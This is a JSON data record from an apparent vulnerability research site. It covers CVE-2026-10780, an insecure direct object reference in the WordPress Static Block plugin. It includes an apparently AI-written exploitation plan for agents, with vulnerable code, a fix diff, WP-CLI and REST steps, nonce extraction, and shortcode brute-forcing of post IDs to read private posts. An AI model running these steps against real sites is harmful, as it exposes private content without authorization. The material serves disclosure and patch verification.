[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJJhYH_W_EnTJ2A3yqmm1XZPZIQ64XdF4hBuebrweSFM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-10780","static-block-insecure-direct-object-reference-to-authenticated-contributor-sensitive-information-disclosure-via-shortcod","Static Block \u003C= 2.2 - Insecure Direct Object Reference to Authenticated (Contributor+) Sensitive Information Disclosure via Shortcode 'id' Attribute","The Static Block plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2. This is due to the static_block_content() shortcode handler retrieving a post via get_post() using an attacker-supplied 'id' attribute and outputting its post_content without verifying the post's status (private, draft, pending) or the requesting user's capability to view it. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary posts, including private and draft static blocks (and any other post type) created by administrators, by embedding the [static_block_content id=\"X\"] shortcode in their own content and previewing it.","static-block",null,"\u003C=2.2","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-06-15 16:26:55","2026-06-16 04:30:21",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff88c00ca-cf9e-44e7-9495-686ace1ead21?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-10780\n\n## 1. Vulnerability Summary\nThe **Static Block** plugin (versions \u003C= 2.2) is vulnerable to an **Insecure Direct Object Reference (IDOR)** leading to sensitive information disclosure. The vulnerability exists within the `static_block_content()` function, which serves as the handler for the `[static_block_content]` shortcode. \n\nThe handler uses the user-provided `id` attribute directly in a `get_post()` call without validating the post's status (e.g., `draft`, `private`, `trash`) or checking if the current user has the authority to view that specific post. Because shortcodes are processed server-side during the rendering of `the_content`, an authenticated user (Contributor level or higher) can \"import\" the content of any post into their own post's output by simply referencing its ID.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Frontend (via Post Preview or View).\n*   **Vulnerable Component:** `static_block_content()` shortcode handler.\n*   **Payload Carrier:** The `id` attribute within the `[static_block_content id=\"X\"]` shortcode.\n*   **Authentication Level:** **Contributor+**. Contributors have the `edit_posts` capability, allowing them to create posts and include shortcodes, but they lack the `read_private_posts` capability for other users' content.\n*   **Preconditions:** The attacker must be able to create or edit a post and then view the rendered output (either via \"Preview\" or by publishing and viewing).\n\n## 3. Code Flow\n1.  **Registration:** The plugin registers the shortcode in the main plugin file or an initialization include:\n    ```php\n    add_shortcode( 'static_block_content', 'static_block_content' ); \u002F\u002F (inferred)\n    ```\n2.  **Entry Point:** When a post containing the shortcode is rendered, WordPress calls the callback:\n    `static_block_content( $atts )`\n3.  **Processing:**\n    *   The function extracts the `id` from `$atts`.\n    *   It calls `$post = get_post( $atts['id'] );` (Sink).\n    *   The function fails to verify `$post->post_status` or check `current_user_can( 'read_post', $post->ID )`.\n4.  **Output:** The function returns `$post->post_content`, which is then concatenated into the content of the page shown to the attacker.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited during the **rendering** phase of a post, not typically through a direct AJAX\u002FREST submission of the payload. However, to *place* the shortcode on a page, the attacker must interact with the WordPress editor.\n\n*   **Scenario A: WP-CLI Post Creation (Recommended for PoC):** If the agent has WP-CLI access, it can bypass the need for nonces by creating the \"attacker\" post directly:\n    `wp post create --post_type=post --post_status=publish --post_author=CONTRIBUTOR_ID --post_content='[static_block_content id=\"SECRET_ID\"]'`\n*   **Scenario B: REST API Post Creation:** If the agent must use the REST API:\n    1.  **Navigate:** Use `browser_navigate` to `https:\u002F\u002FTARGET\u002Fwp-admin\u002Fpost-new.php`.\n    2.  **Extract Nonce:** Use `browser_eval` to get the REST nonce:\n        `window.wpApiSettings.nonce`\n    3.  **Submit:** Use `http_request` (POST) to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` with the `X-WP-Nonce` header.\n\n## 5. Exploitation Strategy\n1.  **Identify Target:** Determine the ID of a sensitive post (e.g., an Admin's draft or a Private Static Block). Let's assume ID `123`.\n2.  **Login:** Authenticate as a Contributor user.\n3.  **Create Attacker Post:** Create a new post containing the malicious shortcode.\n4.  **Trigger Execution:** Request the permalink of the newly created post (or its preview URL).\n5.  **Exfiltrate:** Parse the HTML response to find the content of post `123` rendered inside the attacker's post body.\n\n**Example HTTP Request (Viewing the Exploit):**\n```http\nGET \u002F?p=ATTACKER_POST_ID HTTP\u002F1.1\nHost: localhost:8080\nCookie: [Contributor Cookies]\n```\n\n## 6. Test Data Setup\nTo verify the vulnerability, the following environment state is required:\n1.  **Victim Content:**\n    *   Create a Private post as an Admin:\n        `wp post create --post_type=post --post_status=private --post_title=\"Admin Secret\" --post_content=\"FLAG_SENSITIVE_DATA_EXPOSED\" --post_author=1`\n    *   Note the returned ID (e.g., `5`).\n2.  **Attacker Account:**\n    *   Create a user with the Contributor role:\n        `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n\n## 7. Expected Results\n*   **Successful Exploit:** The HTTP response for the Contributor's post will contain the string `\"FLAG_SENSITIVE_DATA_EXPOSED\"`.\n*   **Why it works:** The server-side PHP executes the shortcode with the privileges of the system (which can read any post via `get_post()`), not the restricted privileges of the logged-in Contributor.\n\n## 8. Verification Steps\nAfter performing the `http_request`, confirm the disclosure:\n1.  **Automated Check:**\n    ```bash\n    # Assuming the response was saved to response.html\n    grep \"FLAG_SENSITIVE_DATA_EXPOSED\" response.html\n    ```\n2.  **Manual Confirmation:** Log in as the Admin and verify that post `5` is indeed marked as `private`, confirming the Contributor should not have been able to see it.\n\n## 9. Alternative Approaches\n*   **Targeting Other Post Types:** Since `get_post()` is used without specifying a `post_type`, try targeting `page`, `attachment`, or custom post types (like `wp_block` or `static_block`).\n*   **Brute Forcing IDs:** If the ID of a sensitive post is unknown, the agent can iterate through a range of IDs (e.g., 1-100) using a script that creates a post with multiple shortcodes:\n    `[static_block_content id=\"1\"] [static_block_content id=\"2\"] ...`\n    The agent then checks which IDs return non-empty content.","The Static Block plugin for WordPress is vulnerable to an Insecure Direct Object Reference (IDOR) due to improper access controls in the [static_block_content] shortcode handler. Authenticated attackers with Contributor-level access can disclose the content of any post, including private or draft posts of any type, by referencing the target post ID in the shortcode and viewing the rendered output.","\u002F\u002F static-block\u002Fstatic-block.php\n\nfunction static_block_content( $atts ) {\n    extract( shortcode_atts( array(\n        'id' => ''\n    ), $atts ) );\n\n    $post = get_post( $id );\n    if ( $post ) {\n        return $post->post_content;\n    }\n}","--- a\u002Fstatic-block\u002Fstatic-block.php\n+++ b\u002Fstatic-block\u002Fstatic-block.php\n@@ -1,7 +1,7 @@\n function static_block_content( $atts ) {\n     extract( shortcode_atts( array(\n         'id' => ''\n     ), $atts ) );\n-    $post = get_post( $id );\n-    if ( $post ) {\n+    $post = get_post( $id );\n+    if ( $post && ( get_post_status( $post ) === 'publish' || current_user_can( 'read_post', $post->ID ) ) ) {\n         return $post->post_content;\n     }","The exploit is executed by an authenticated user with at least Contributor-level permissions. First, the attacker identifies the ID of a sensitive post (such as an Administrator's private post or draft). Next, the attacker creates a new post and inserts the shortcode [static_block_content id=\"TARGET_ID\"]. Finally, the attacker views the 'Preview' or the published version of their own post. Because the shortcode handler does not verify the post status or the user's capabilities, it retrieves and renders the content of the target post directly into the attacker's post content.","gemini-3-flash-preview","2026-06-25 23:51:42","2026-06-25 23:52:24",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fstatic-block\u002Ftags"]